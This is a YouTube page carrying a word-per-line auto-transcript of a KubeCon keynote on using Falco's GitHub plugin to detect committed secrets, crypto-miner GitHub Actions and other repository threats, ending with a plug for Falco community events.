►
From YouTube: Keynote: Detecting Threats in GitHub with Falco - Loris Degioanni, CTO & Founder, Sysdig
Description
Don’t miss out! Join us at our upcoming event: KubeCon + CloudNativeCon Europe 2023 in Amsterdam, The Netherlands from April 17-21. Learn more at https://kubecon.io. The conference features presentations from developers and end users of Kubernetes, Prometheus, Envoy, and all of the other CNCF-hosted projects.
Keynote: Detecting Threats in GitHub with Falco - Loris Degioanni, Chief Technology Officer & Founder, Sysdig
Are your code repositories secure? Misconfigurations and attacks that target GitHub repositories are a serious source of risk, which many people underestimate. Learn what the most common issues with GitHub security are, and how to detect and prevent them with CNCF's Falco.
A
Good
morning,
everyone,
my
name,
is
Loris
de
Gianni
I'm,
a
CTO
and
founder
of
sysdig
sisdig
is
the
leader
in
container
kubernetes
and
Cloud
security
I'm.
Also,
the
original
Creator
and
one
of
the
maintainers
of
Falco
Falco
is
the
cncf
runtime
security
tool
and
it's
essentially
the
de
facto
component
for
runtime
Security
in
kubernetes
and
for
containers.
A
Today
we're
going
to
talk
about
GitHub
in
general.
If
I
were
to
ask
you
the
following
question
in
in
your
job,
what
is
your
most
valuable
asset
other
than
people?
Of
course,
probably
many
of
you
would
answer
my
source
code,
and
probably
many
of
you
I
guess
the
majority
of
you
have
your
source
code
in
GitHub
or
in
an
in
general,
in
some
kind
of
git
repositories.
So
my
question
at
this
point
is:
are
your
repositories
safe?
A
This
is
the
place
where
your
most
important
thing
is.
This
is
also
a
prime
target,
typically
for
attacks.
So
there
are
several
areas,
several
categories
of
threats,
that
your
source
code
repositories
are
subject
to
examples,
pushing
secrets
in
a
GitHub
repository.
This
is
something
that
happens
routinely
despite
the
checks
that
we
put
in
place
to
to
prevent
it
and
countless
major
breaches,
including
recent
ones
like
there
was
a
Toyota
one
like
last
week,
are
caused
by
you
know
something
members
just
committing
a
secret,
a
password,
a
key
or
something
on
a
repository.
A
Another
example
is
a
running
GitHub
actions
with
miners.
This
is
something
that
is
becoming
more
and
more
of
an
issue.
Github
is
giving
us
more
and
more
flexibility
to
complement
our
code
repositories
and
the
events
that
can
happen
on
this
code
repositories
with
actions
that
are
actually
executed
on
a
Computing
pool
that
is
of
offered
to
us
by
by
kitab.
A
Of
course,
whenever
there's
a
Computing
pool
where
you
can
execute
arbitrary
actions
and
code,
then
there's
a
risk
for
somebody,
internal
or
external,
to
abuse
that
and
use
it
for
things
that
it
wasn't
designed
for,
like,
for
example,
running
GitHub
miners,
which
is
something
pretty
common,
and
it's
been
abused
in
a
public
visible
way
multiple
times.
Another
example
is
mistakenly
publishing
a
private
repository.
You
know
that
feeling
when
you
discover
that
somebody
published
the
wrong
repository
and
your
code,
maybe
with
Secrets
inside,
is
publicly
available
online.
A
Yes,
GitHub
asks
you
to
confirm
to
type
the
name
of
the
repository
when
you
take
an
action
like
that,
and
yes,
this
still
happens.
For
example,
it
happened
to
me
a
few
years
ago
and
I
tell
you
it's
not
it's
not
a
pleasant
feeling.
So
what
is?
How
can
we
detect
and
protect
from
threads
like
this
one
possible
approach
that
I'm
going
to
talk
about
in
this
few
minutes?
That
I
have
is
using
Falco
as
I
was
mentioning.
Falco
is
what
I
often
describe
as
the
security
camera
for
modern
applications.
A
Falco
typically
listens
on
your
containerized
kubernetes
based
endpoints.
It
captures
a
bunch
of
signals,
for
example,
system
calls
and
it's
a
it's.
It
has
a
detection
engine
that
is
able
to
give
you
alerts,
so
it
detects
bad
stuff
and
gives
you
alerts.
Falco
traditionally
has
been
designed
to
protect
containers
and
pods
and
namespace
and
services
on
kubernetes,
but
recently
we
have
released
a
guitar
plugin
so
that
you
can
have
the
same
type
of
real
time.
Runtime
security
that
Falco
is
based
on,
but
for
GitHub.
A
Let's
see
how
it
works,
works,
so
I
actually
have
a
virtual
machine
here
where
I'm
just
going
to
run.
You
know
my
local
copy
of
Falco
and
I
run
it
configured
essentially
to
connect
to
my
test.
Github
repository
I
can
see
that
immediately.
Falco
tells
me,
you
know
that
it's
connected
to
the
repository.
In
fact,
if
I
go
to
my
repository,
I
can
see
that
now,
falc
automatically
under
the
hood,
has
created
a
webbook
to
collect
data
from
this
Repository.
A
Now,
if
I
go
in
the
repository
and
for
example,
you
know
I
have
this
minor
action,
which
is
just
you
know,
running
XM
rig
a
well-known
Miner,
and
what
I'm
going
to
do
is
I'm
just
going
to
run
this
action
manually
in
my
repository
they
actually
started
and
I
can
see
that
right
away.
A
Falco
was
able
to
listen
essentially
to
what
was
happening
in
that
repository
repository
and
tell
me
that
a
an
action
with
crypto
miners
was
executed
and
tell
me
the
name
of
the
repository,
the
name
of
the
file
and
all
of
the
information
that
they
need.
Another
example
is
I,
have
you
know
a
little
little
piece
of
source
code
in
this
repository?
A
So
let
me
uncomment,
you
know
I'm
at
just
committing
a
AWS
hash
in
this
repository
and
then
let
me
just
push
it
to
the
Repository
and
again
here
you
see
one
or
more
secrets
were
pushed
into
private
repository.
It's
telling
me
the
file
is
telling
me
the
line.
I
can
you
know
even
go
and
if
I
want,
you
know,
browse
and
go
take
a
look
exactly
where
decline
was
committed
in
my
repository,
so
Falco
is
essentially
able
to
dynamically.
A
Do
this
for
me
and,
as
you
can
see,
I
get
a
reaction
immediately
in
real
time
in
a
matter
of
few
seconds.
So
that's
the
beauty
of
a
runtime
security
tool
like
Falco.
We
are
used
to
deploy
this
kind
of
runtime
security
tools
to
detect
that
somebody
spawns
a
shell
in
inside
one
might
pause
in
kubernetes,
but,
as
you
can
see,
the
process
is
applicable
to
other
stuff
as
well,
and
Falco
has
many
plugins
that
can
interface
with
with
the
different
tools
of
your
ecosystem.
A
To
do
this
kind
of
detections
falcos
Bay
is
the
only
simple
rule
engine
so
I
can.
Actually
you
know
these
are
the
rules,
for
example.
This
was.
This
is
what's
the
rule
that
Falco
used
to
detect
miners,
so
it's
just
a
yaml
file
that
they
can
go
I
can
edit
I
can
modify.
I
can
add
my
own
rules,
for
example,
here
in
this
file,
I
customized
it
with
just
a
simple
rule
that
you
know
the
condition
the
text
when
a
GitHub
action
of
type
star
is
being
created.
A
So
essentially,
this
is
when
somebody
started
my
repository.
So
if
I
go
here
and
I
start,
my
repository
as
you
can
see
immediately,
Falco
is
able
to
detect
that
and
show
me
in
real
time
that
I
got
to
start
from
user
El
dejo.
So,
as
you
can
see
very
easy,
very
simple,
a
rule
is
nothing
else
than
a
condition
and
the
output
that
they
want
to
see
when
that
condition
is
met.
So
creating
GitHub
rules
for
your
needs
is
going
to
be
very
easy.
A
In
general,
Falco
is
free.
It's
open
source,
it's
cncf!
We
are
looking,
hopefully
to
graduate
the
tool
in
the
next
few
months,
so
I
recommend
that
everybody
takes
the
look
takes
a
look.
It
can
really
be
helpful
for
this
kind
of
scenario.
A
Just
one
last
thing
we
are
having
a
Falco
party
tonight,
it's
the
fireball
table
not
far
from
here.
So
if
you
want
to
come
meet,
Falco
developers
learn
more
or
just
socialize
and
have
a
nice
drink
with
friends.
Please
join
us
tonight
also
this
afternoon,
we'll
have
I
think
starting
at
1pm
a
session
with
the
Falco
developers,
where
you
can
go
in
these
questions
and
ask
your
their
help
or
learn
the
roadmap,
and
so
on
so
come
see.
Us
come
meet
with
us,
we're
really
here
and
we're
really
eager
to
meet
with
you.